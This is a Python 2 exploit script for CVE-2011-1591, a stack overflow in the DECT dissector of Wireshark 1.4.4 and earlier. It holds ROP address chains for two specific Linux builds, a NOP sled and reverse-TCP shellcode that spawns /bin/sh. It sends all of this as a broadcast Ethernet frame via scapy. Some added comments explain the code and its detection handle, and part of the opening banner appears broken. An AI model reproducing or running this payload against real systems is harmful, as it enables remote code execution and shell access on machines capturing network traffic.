#!/usr/bin/env python
# Start-up banner (printed by the `print a` statement further down).
# NOTE(review): the closing triple-quote is not present in the visible
# text, presumably lost in extraction; as shown, this literal is
# unterminated.  The whole file is Python 2 (print statements, has_key,
# iteritems) and the original indentation has been stripped.
a = """
\n\t-- CVE: 2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect() --\n
import sys, struct
# scapy is the only non-stdlib dependency; it supplies Ether() and sendp()
# used at the bottom of the file.  The import path is chosen by interpreter
# version: scapy.all on Python 2.5+, the top-level scapy package otherwise.
# Both branches are star-imports, so scapy's names are dumped into the
# module namespace.
if sys.version_info >= (2, 5):
    from scapy.all import *
else:
    from scapy import *
def _x(v):
    """Return *v* packed as one little-endian unsigned 32-bit word.

    Equivalent to ``struct.pack("<I", v)``; every entry of the address
    tables in this file goes through this helper so the lists hold raw
    4-byte strings.  Values outside 0..0xffffffff raise ``struct.error``.
    """
    word = struct.Struct("<I")
    return word.pack(v)
# Address list for target 1 ("Arch Linux 2010.05" in addr_os): 32-bit
# little-endian words, packed by _x and later concatenated verbatim after
# the padding block.  The values are fixed constants for that one binary
# build; the file carries no symbol information, so the entries are not
# annotated individually.  The `*7` entry repeats a single word seven
# times.
arch_rop_chain= [
    _x(0x8069acb),
    _x(0), _x(0x80e9360), _x(0),
    _x(0x8067d90),
    _x(0x8081f2e),
    _x(0x80f9d7f),
    _x(0x8061804),
    _x(0xffff0000),
    _x(0x80c69f0),
    _x(0x80ff067),
    _x(0x8077c53),
    _x(0x8061804),
    _x(0x7f16a5d0),
    _x(0x8048360),
    _x(0x8089f46),
    _x(0x8067d90),
    _x(0x8081f2e),
    _x(0x8067d92)*7,
    _x(0x80745f9),
    _x(0),
    _x(0x8065226),
    _x(0x81aca20-0xc),
    _x(0x8074597),
    _x(0x8048360),
    _x(0x8065226),
    _x(0x6fe70),
    _x(0x8081f2e),
    _x(0x806973d),
    _x(0x08104f61),
    _x(0x0811eb63),
    _x(0),
    _x(0x10000),
    _x(0x7),
    _x(0x8061804),
    _x(0xff+0x50),
    _x(0x80b8fc8),
    _x(0x8067d90),
    _x(0x80acc63),
    _x(0x8081f2e),
    _x(0x0806979e)
]
# Address list for target 2 ("Labs test " in addr_os).  Same format as
# arch_rop_chain: fixed 32-bit little-endian constants for one specific
# build, appended verbatim after the padding block.  Not annotated per
# entry, as the file gives no symbol names to ground such comments.
labs_rop_chain = [
    _x(0x08073fa1),
    _x(0), _x(0x0808c4d3), _x(0),
    _x(0x080e64cf),
    _x(0x7), _x(0x0),
    _x(0x080a1711),
    _x(0x0815b74f),
    _x(0xffff0000),
    _x(0x0804c73c),
    _x(0x080fadd7),
    _x(0x0804c73c),
    _x(0x080af344),
    _x(0x0815b74f),
    _x(0x10000),
    _x(0x80d8b71),
    _x(0x7D),
    _x(0x804e6df),
    _x(0xffffe411),
    _x(0x080ab949),
    _x(0x0815b74f),
    _x(256),
    _x(0x080a1711),
    _x(0x081087d3),
    _x(0x080f7cb1)
]
# Target table: id -> [name, byte_count_or_code, address_list].
#   * Positive IDs (1, 2) are the two builds this script actually handles:
#     the second field is the number of bytes the padding block is sized
#     to (0xb9 / 0xbf) and the third is the address list appended after it.
#   * Negative IDs are informational only: the second field is a code that
#     usage() turns into a message (-1, -2, -3) and the third is False.
#     The argument checks at the bottom of the file reject them before any
#     payload is built.
addr_os = {
    1: ["Arch Linux 2010.05",0xb9, arch_rop_chain],
    2: ["Labs test ",0xbf, labs_rop_chain],
    -1 : ["Debian 5.0.8 Lenny",-3, False],
    -2 : ["Debian 6.0.2 Squeeze",-1, False],
    -3 : ["Fedora 14 ",-1, False],
    -4 : ["OpenSuse 11.3 ",-1, False],
    -5 : ["Ubuntu 10.10 | 11.04",-1, False],
    -6 : ["Gentoo *",-2, False]
}
# Print the banner defined at the top of the file (Python 2 print statement).
print a
def usage():
    """Print the target table and exit with status 1.

    Every entry of ``addr_os`` is listed with its ID and name.  The entry's
    second field selects the text printed after the name: -1, -2 and -3
    map to the three explanatory messages below; any other value is
    printed as a stack size.  Python 2 syntax (print statements,
    ``dict.iteritems``) is used throughout.
    """
    print "Please select and ID >= 0 :\n"
    print " IDTARGETINFO"
    print "--------------------------------------------------------------------"
    # i is (id, [name, code_or_size, address_list]); the trailing comma on
    # the first print keeps the description on the same line as the ID.
    for i in addr_os.iteritems():
        print "%2d-- %s "%(i[0], i[1][0]),
        if i[1][1] == -1:
            print "Default package uses LibSSP & Fortify Source"
        elif i[1][1] == -2:
            print "Compiled/Build with Fortify Source"
        elif i[1][1] == -3:
            print "DECT protocol not supported"
        else:
            print "VULN -> Stack size %d"%(i[1][1])
    # NOTE(review): indentation was lost in the source; the exit is placed
    # after the loop, which matches the intent of listing every target.
    sys.exit(1)
# --- argument handling -----------------------------------------------------
# The only argument is a target ID from addr_os.  A missing, unknown or
# negative ID falls through to usage(), which exits.  int() on a
# non-numeric argument raises ValueError before any of these checks run.
if len(sys.argv) == 1:
    usage()
elif addr_os.has_key(int(sys.argv[1])) is False:
    usage()
elif int(sys.argv[1]) < 0:
    usage()
target = addr_os[int(sys.argv[1])]
print "\n[+] Target : %s"%target[0]
# target[2] is the packed address list for this target; joining it yields
# the raw byte string appended after the padding block.  (Negative-ID
# entries carry False here, but those were rejected above.)
rop_chain = "".join([ rop for rop in target[2]])
# Opaque machine-code byte string, sent verbatim; not disassembled here.
# Only its length takes part in the arithmetic below.
rev_tcp_shell = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
# target[1]: the byte count the padding block is sized to (0xb9 or 0xbf for
# the two handled targets, per addr_os).
SEIP_SMASH = target[1]
print "\t[+] Length for smashing SEIP : 0x%x(%d)"%(SEIP_SMASH, SEIP_SMASH)
# Padding block: head_nop bytes of 0x90, then the machine code, then enough
# trailing 0x90 bytes to make the block exactly SEIP_SMASH bytes long.
nopsled = "\x90"
head_nop = 50
shellcode = nopsled * head_nop + rev_tcp_shell + nopsled * (SEIP_SMASH-len(rev_tcp_shell) - head_nop)
payload = shellcode + rop_chain
# An odd-length payload loses its first byte: diff can only be 1 here, so
# the slice is payload[1:].
if (len(payload) % 2):
    diff = len(payload) % 2
    payload = payload[(2-diff):]
print "\t[+] Payload length : %d"%len(payload)
# What is observable on the wire: one Ethernet frame to the broadcast MAC
# with the non-standard EtherType 0x2323 and the byte string above as its
# payload.  That EtherType/destination pair is the detection handle for
# this script; per the banner, only Wireshark <= 1.4.4 is affected.
evil_packet = Ether(type=0x2323, dst="ff:ff:ff:ff:ff:ff") / payload
print "\t[+] Evil packet length : %d"%len(evil_packet)
print "\t[+] Sending packet to broadcast"
# sendp() transmits at layer 2 on scapy's default interface; no IP header
# is added, so the frame is seen only on the local segment.
sendp(evil_packet)